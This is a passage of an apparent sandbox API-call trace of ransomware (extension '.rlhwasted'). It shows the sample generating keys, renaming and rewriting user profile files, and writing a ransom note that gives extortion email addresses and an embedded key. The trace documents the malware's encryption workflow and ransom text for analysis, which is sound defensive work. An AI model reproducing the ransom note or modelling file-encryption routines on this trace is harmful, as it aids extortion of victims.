lpFileSizeHigh=0x112fdd4*=0x0) returned 0x85 [0199.453] MapViewOfFile (hFileMappingObject=0x10c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x85) returned 0x6a0000 [0199.453] CloseHandle (hObject=0x128) returned 1 [0199.453] UnmapViewOfFile (lpBaseAddress=0x6a0000) returned 1 [0199.453] CloseHandle (hObject=0x10c) returned 1 [0199.453] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x200) returned 0x6efa80 [0199.454] CryptAcquireContextW (in: phProv=0x112fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fdc4*=0x6f4f10) returned 1 [0199.455] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x1b8, pbBuffer=0x6efac8 | out: pbBuffer=0x6efac8) returned 1 [0199.455] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0199.455] CryptAcquireContextW (in: phProv=0x112fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fb2c*=0x6f4f10) returned 1 [0199.456] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x200, pbBuffer=0x112fb48 | out: pbBuffer=0x112fb48) returned 1 [0199.456] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0199.468] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x403) returned 0x6e8978 [0199.468] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6efa80 | out: hHeap=0x6b0000) returned 1 [0199.468] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6fcd40 [0199.468] _snwprintf (in: _Dest=0x6fcd40, _Count=0x51a, _Format="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]MXZsDtKk6QImStF+YvtmBf29lwxfLYqhPFel8sqar2u0vogqO+vJusTCIV+kEAhn\r\nYnZK6SfX80nx7ZT7srSiJMKiEP3B+0kt2D9i9rmiUxjmoWH3SmnirQDl8JGho1S1\r\nvv66Ggi97MBD67QniAgE4/VjGHis8pYcC89w/UBleIz1JV04a4/Yg1wGProUTtcm\r\nW/sKFTpi1YmSsb8YzrtH8W34l4MndHpaTCGCUg47mlVJR4tShjjw0Z0d/uer+UVX\r\nEMgj6qvRgILbtm2y2bWXH2ljaClC0iSTq2sW0e88EXOkamuB9bMSNgFx4ai/AZXF\r\njDaTRkNkwdi7qfiadbSWtu+Yl4FrczhBuKv3HR11PanmIzuSab5FMsqJbdTZd6AT\r\npVPhTl+RMXgEBEY5UoXC+eOBs1JRqYle7nO2twMBh/JZJdPwohUzQMmCyf27Q1FV\r\n+OOucHEqUneh74gzv8q4u7eEc9JRddnKe3ZWU4SyZ1UeFb5JwncPu6iWYNKQFrwW\r\njxuYBcCZFQ0n+OaOVU4cWPCAP0om7wOW4f095QXPkZ52hJm6+XFTFTsaYKTLDRhW\r\nYvyps8pRP9naqFv7wMCEX+5VSXsJOJDBG6zpUXPgrqKve3Zegr8Hte+lZxS1/OF+\r\nR0T+PDeYKfAuiHy48IVHJZUHeQQAlhhzBwc4+VAuid0=[end_key]\r\nKEEP IT\r\n") returned 981 [0199.468] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e8978 | out: hHeap=0x6b0000) returned 1 [0199.468] WriteFile (in: hFile=0x104, lpBuffer=0x6fcd40*, nNumberOfBytesToWrite=0x7aa, lpNumberOfBytesWritten=0x112fe38, lpOverlapped=0x0 | out: lpBuffer=0x6fcd40*, lpNumberOfBytesWritten=0x112fe38*=0x7aa, lpOverlapped=0x0) returned 1 [0199.468] SetEndOfFile (hFile=0x104) returned 1 [0199.472] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6fcd40 | out: hHeap=0x6b0000) returned 1 [0199.472] CloseHandle (hObject=0x104) returned 1 [0199.472] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d4580 | out: hHeap=0x6b0000) returned 1 [0199.472] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6f2770 | out: hHeap=0x6b0000) returned 1 [0199.472] _aulldvrm () returned 0x0 [0199.472] CryptAcquireContextW (in: phProv=0x112fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fe0c*=0x6f4f10) returned 1 [0199.474] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x48, pbBuffer=0x112fe48 | out: pbBuffer=0x112fe48) returned 1 [0199.474] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0199.474] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG") returned 35 [0199.474] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x250) returned 0x6efa80 [0199.474] lstrcpyW (in: lpString1=0x6efac6, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0199.474] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6fcd40 [0199.474] CryptAcquireContextW (in: phProv=0x112fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fde8*=0x6f4f10) returned 1 [0199.475] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0xa34, pbBuffer=0x6fcd40 | out: pbBuffer=0x6fcd40) returned 1 [0199.475] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0199.475] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG.rlhwasted_info" (normalized: "c:\\users\\default\\ntuser.dat.log.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0199.476] WriteFile (in: hFile=0x104, lpBuffer=0x6fcd40*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x112fe04, lpOverlapped=0x0 | out: lpBuffer=0x6fcd40*, lpNumberOfBytesWritten=0x112fe04*=0xa34, lpOverlapped=0x0) returned 1 [0199.478] SetEndOfFile (hFile=0x104) returned 1 [0199.478] SetFilePointer (in: hFile=0x104, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0199.478] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6fcd40 | out: hHeap=0x6b0000) returned 1 [0199.478] lstrcpyW (in: lpString1=0x6efac6, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0199.478] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG" (normalized: "c:\\users\\default\\ntuser.dat.log"), lpNewFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG.rlhwasted" (normalized: "c:\\users\\default\\ntuser.dat.log.rlhwasted")) returned 1 [0199.479] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG.rlhwasted" (normalized: "c:\\users\\default\\ntuser.dat.log.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0199.480] CreateFileMappingW (hFile=0x10c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x128 [0199.480] GetFileSize (in: hFile=0x10c, lpFileSizeHigh=0x112fdd4 | out: lpFileSizeHigh=0x112fdd4*=0x0) returned 0x400 [0199.480] MapViewOfFile (hFileMappingObject=0x128, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x400) returned 0x6a0000 [0199.480] CloseHandle (hObject=0x10c) returned 1 [0199.495] UnmapViewOfFile (lpBaseAddress=0x6a0000) returned 1 [0199.495] CloseHandle (hObject=0x128) returned 1 [0199.495] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x200) returned 0x6e92f0 [0199.495] CryptAcquireContextW (in: phProv=0x112fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fdc4*=0x6f4f10) returned 1 [0199.496] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x1b8, pbBuffer=0x6e9338 | out: pbBuffer=0x6e9338) returned 1 [0199.496] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0199.496] CryptAcquireContextW (in: phProv=0x112fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fb2c*=0x6f4f10) returned 1 [0199.497] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x200, pbBuffer=0x112fb48 | out: pbBuffer=0x112fb48) returned 1 [0199.497] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0199.509] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x403) returned 0x712fd0 [0199.509] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e92f0 | out: hHeap=0x6b0000) returned 1 [0199.509] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6fcd40 [0199.509] _snwprintf (in: _Dest=0x6fcd40, _Count=0x51a, _Format="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]lsZ62hNzR8b5hWCyijLZc48nWsRws3NYGvwItqpEue6C0fdBaSB9w3dylJutlqZV\r\nZL6q8K4oIINpIB3CwNnpVxg0U0cyH3MugUHLUOzlFpOjmXxoTgKgKudJHyTM0xI8\r\n8TYZ0rMBId6y4bhtdh/hDAUbZxA/8Z7gPxtu8/Gbd/Fc/Agy6c7kyRf/63xu/kyg\r\niHVOdk39iUGNGrZ46PdmYIPCrjsvQr/dQblT6Gvuz/01Pai24K/ddTRYhdZAsyEb\r\nlaH9PJowyKPRvFFiPHH/wl3MjU9eI8+DH5pihitEui1Jm5KkDAXRLh9xrXAmCF5c\r\n+I4LuE2F8aqJvMBbB1jKhEDbYOsdZKEpocpC1ZxbjT2fLUjSgXOODr2l6UbxgVJu\r\nCdCcJLwtG/tSE+Lorfqba2zqGl7GrEczHPFL3c5N4Huw0Q9IxPMNaYtpHOjudxTJ\r\n7Oe7NW/KADN1//E40r00iVC53YwOiVPVxbMyElMA6QhzRiSVvjI1Ds6Le0mySv2N\r\n6tedmROWz2L2L9T3Zc5G57gbDpqw3QoLfN53SHznN+YdpO8ZJFcvRBa3n34UBP4z\r\nNbhrxJJHqwEB242xJtPQc+yYVUZDWvmyFhoGsdfO7sgKdWeDCrdvbHu5BYPGj5hU\r\nqVhIRn6/f1qxCMXMcHhcqrianWm0rQmxF5uGvlk+q3E=[end_key]\r\nKEEP IT\r\n") returned 981 [0199.509] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x712fd0 | out: hHeap=0x6b0000) returned 1 [0199.509] WriteFile (in: hFile=0x104, lpBuffer=0x6fcd40*, nNumberOfBytesToWrite=0x7aa, lpNumberOfBytesWritten=0x112fe38, lpOverlapped=0x0 | out: lpBuffer=0x6fcd40*, lpNumberOfBytesWritten=0x112fe38*=0x7aa, lpOverlapped=0x0) returned 1 [0199.509] SetEndOfFile (hFile=0x104) returned 1 [0199.512] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6fcd40 | out: hHeap=0x6b0000) returned 1 [0199.512] CloseHandle (hObject=0x104) returned 1 [0199.512] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6efa80 | out: hHeap=0x6b0000) returned 1 [0199.513] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e88d8 | out: hHeap=0x6b0000) returned 1 [0199.513] _aulldvrm () returned 0x0 [0199.513] CryptAcquireContextW (in: phProv=0x112fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fe0c*=0x6f4f10) returned 1 [0199.514] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x48, pbBuffer=0x112fe48 | out: pbBuffer=0x112fe48) returned 1 [0199.514] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0199.514] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 76 [0199.514] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2a2) returned 0x712fd0 [0199.514] lstrcpyW (in: lpString1=0x713068, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0199.514] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6e8188 [0199.514] CryptAcquireContextW (in: phProv=0x112fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fde8*=0x6f4f10) returned 1 [0199.515] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0xa34, pbBuffer=0x6e8188 | out: pbBuffer=0x6e8188) returned 1 [0199.515] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0199.515] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf.rlhwasted_info" (normalized: "c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tm.blf.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0199.516] WriteFile (in: hFile=0x104, lpBuffer=0x6e8188*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x112fe04, lpOverlapped=0x0 | out: lpBuffer=0x6e8188*, lpNumberOfBytesWritten=0x112fe04*=0xa34, lpOverlapped=0x0) returned 1 [0199.518] SetEndOfFile (hFile=0x104) returned 1 [0199.518] SetFilePointer (in: hFile=0x104, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0199.518] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e8188 | out: hHeap=0x6b0000) returned 1 [0199.518] lstrcpyW (in: lpString1=0x713068, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0199.518] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf" (normalized: "c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tm.blf"), lpNewFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf.rlhwasted" (normalized: "c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tm.blf.rlhwasted")) returned 1 [0199.519] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf.rlhwasted" (normalized: "c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tm.blf.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0199.520] CreateFileMappingW (hFile=0x128, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x10c [0199.520] GetFileSize (in: hFile=0x128, lpFileSizeHigh=0x112fdd4 | out: lpFileSizeHigh=0x112fdd4*=0x0) returned 0x10000 [0199.520] MapViewOfFile (hFileMappingObject=0x10c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x10000) returned 0x6a0000 [0199.520] CloseHandle (hObject=0x128) returned 1 [0199.527] UnmapViewOfFile (lpBaseAddress=0x6a0000) returned 1 [0199.528] CloseHandle (hObject=0x10c) returned 1 [0199.528] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x200) returned 0x6e92f0 [0199.528] CryptAcquireContextW (in: phProv=0x112fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fdc4*=0x6f4f10) returned 1 [0199.529] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x1b8, pbBuffer=0x6e9338 | out: pbBuffer=0x6e9338) returned 1 [0199.529] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0199.530] CryptAcquireContextW (in: phProv=0x112fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fb2c*=0x6f4f10) returned 1 [0199.530] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x200, pbBuffer=0x112fb48 | out: pbBuffer=0x112fb48) returned 1 [0199.530] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0199.542] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x403) returned 0x6d5420 [0199.542] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e92f0 | out: hHeap=0x6b0000) returned 1 [0199.542] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6e8188 [0199.542] _snwprintf (in: _Dest=0x6e8188, _Count=0x51a, _Format="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]JS5luhaSXsPjFebigq5hJnoUbWlaPJopOEZI8TfQZw1lrE9aCnJgrgs4pyOX8eFP\r\n7ZdTSVvOMhpKvuL3jjQL+z4G5WKQKf7ABYRD3+GjTzpAgweSj3/g3f6LlQBUMcm7\r\n/jdBIsZ4p9zSPKltPPUG4WBk9VUSj8zR6Jo08fYzlRUMjENnqgHxMAA6RsdlsxJk\r\nJjq7nhibPuvhvYDZagAabaaGldiI5Gk/Nq8v1Ac8wtU/pplZOTok4HExep3oaCHb\r\nNMZMDAT0EX/nWVUJinM5Jk50Wa6FteQZzs5ygHj/p5LqUN0EP9nbynZj+MQV78jJ\r\nnZvEolEYose2J6PPlj0WrinzI/orzMT9Gzf3dYLLVPJ8KF2eNXMzDfmV6j5eUmNE\r\n2wD1RgDvliaf1AlN9BxZqcUDd+6S29AsPKKjmUF4C1xAnBJKLVNOs0GMs44aclx6\r\nN7GFVwsWoEodZnFAXhbXkaqIhk7LIDgoyUU/N4UWGNmpszKqPBQ2K58HaMx3/ZB2\r\nE+ESs3S/E2tJ3gpfwF1sh3NYW0TyAElbKZskdCXY/HToUpmu2BuAu+/BlqxD3jqF\r\n/tc2Vw+3lS+4nPXFd/sF40my/4yu15i7nkKunbbchmtsNePRZahC4vkH6hzi087z\r\nfgQHKjmUwhFjKyLn5SobJ9dCrlkWWk8dpgsVhdKdNiu=[end_key]\r\nKEEP IT\r\n") returned 981 [0199.542] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d5420 | out: hHeap=0x6b0000) returned 1 [0199.542] WriteFile (in: hFile=0x104, lpBuffer=0x6e8188*, nNumberOfBytesToWrite=0x7aa, lpNumberOfBytesWritten=0x112fe38, lpOverlapped=0x0 | out: lpBuffer=0x6e8188*, lpNumberOfBytesWritten=0x112fe38*=0x7aa, lpOverlapped=0x0) returned 1 [0199.542] SetEndOfFile (hFile=0x104) returned 1 [0199.545] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e8188 | out: hHeap=0x6b0000) returned 1 [0199.545] CloseHandle (hObject=0x104) returned 1 [0199.545] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x712fd0 | out: hHeap=0x6b0000) returned 1 [0199.545] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6fedf0 | out: hHeap=0x6b0000) returned 1 [0199.545] _aulldvrm () returned 0x0 [0199.545] CryptAcquireContextW (in: phProv=0x112fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fe0c*=0x6fdf68) returned 1 [0199.546] CryptGenRandom (in: hProv=0x6fdf68, dwLen=0x48, pbBuffer=0x112fe48 | out: pbBuffer=0x112fe48) returned 1 [0199.546] CryptReleaseContext (hProv=0x6fdf68, dwFlags=0x0) returned 1 [0199.546] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 113 [0199.546] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2ec) returned 0x712fd0 [0199.546] lstrcpyW (in: lpString1=0x7130b2, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0199.546] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6e8188 [0199.546] CryptAcquireContextW (in: phProv=0x112fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fde8*=0x6fdf68) returned 1 [0199.547] CryptGenRandom (in: hProv=0x6fdf68, dwLen=0xa34, pbBuffer=0x6e8188 | out: pbBuffer=0x6e8188) returned 1 [0199.547] CryptReleaseContext (hProv=0x6fdf68, dwFlags=0x0) returned 1 [0199.547] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms.rlhwasted_info" (normalized: "c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000001.regtrans-ms.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0199.548] WriteFile (in: hFile=0x104, lpBuffer=0x6e8188*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x112fe04, lpOverlapped=0x0 | out: lpBuffer=0x6e8188*, lpNumberOfBytesWritten=0x112fe04*=0xa34, lpOverlapped=0x0) returned 1 [0199.550] SetEndOfFile (hFile=0x104) returned 1 [0199.550] SetFilePointer (in: hFile=0x104, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0199.550] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e8188 | out: hHeap=0x6b0000) returned 1 [0199.550] lstrcpyW (in: lpString1=0x7130b2, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0199.550] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms" (normalized: "c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000001.regtrans-ms"), lpNewFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms.rlhwasted" (normalized: "c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000001.regtrans-ms.rlhwasted")) returned 1 [0199.551] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms.rlhwasted" (normalized: "c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000001.regtrans-ms.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0199.552] CreateFileMappingW (hFile=0x10c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x128 [0199.552] GetFileSize (in: hFile=0x10c, lpFileSizeHigh=0x112fdd4 | out: lpFileSizeHigh=0x112fdd4*=0x0) returned 0x80000 [0199.552] MapViewOfFile (hFileMappingObject=0x128, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x80000) returned 0x12e0000 [0199.552] CloseHandle (hObject=0x10c) returned 1 [0199.620] UnmapViewOfFile (lpBaseAddress=0x12e0000) returned 1 [0199.626] CloseHandle (hObject=0x128) returned 1 [0199.626] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x200) returned 0x6e92f0 [0199.626] CryptAcquireContextW (in: phProv=0x112fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fdc4*=0x6fdf68) returned 1 [0199.628] CryptGenRandom (in: hProv=0x6fdf68, dwLen=0x1b8, pbBuffer=0x6e9338 | out: pbBuffer=0x6e9338) returned 1 [0199.628] CryptReleaseContext (hProv=0x6fdf68, dwFlags=0x0) returned 1 [0199.628] CryptAcquireContextW (in: phProv=0x112fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fb2c*=0x6fdf68) returned 1 [0199.629] CryptGenRandom (in: hProv=0x6fdf68, dwLen=0x200, pbBuffer=0x112fb48 | out: pbBuffer=0x112fb48) returned 1 [0199.629] CryptReleaseContext (hProv=0x6fdf68, dwFlags=0x0) returned 1 [0199.639] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x403) returned 0x6d5718 [0199.639] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e92f0 | out: hHeap=0x6b0000) returned 1 [0199.639] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6e8188 [0199.639] _snwprintf (in: _Dest=0x6e8188, _Count=0x51a, _Format="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS 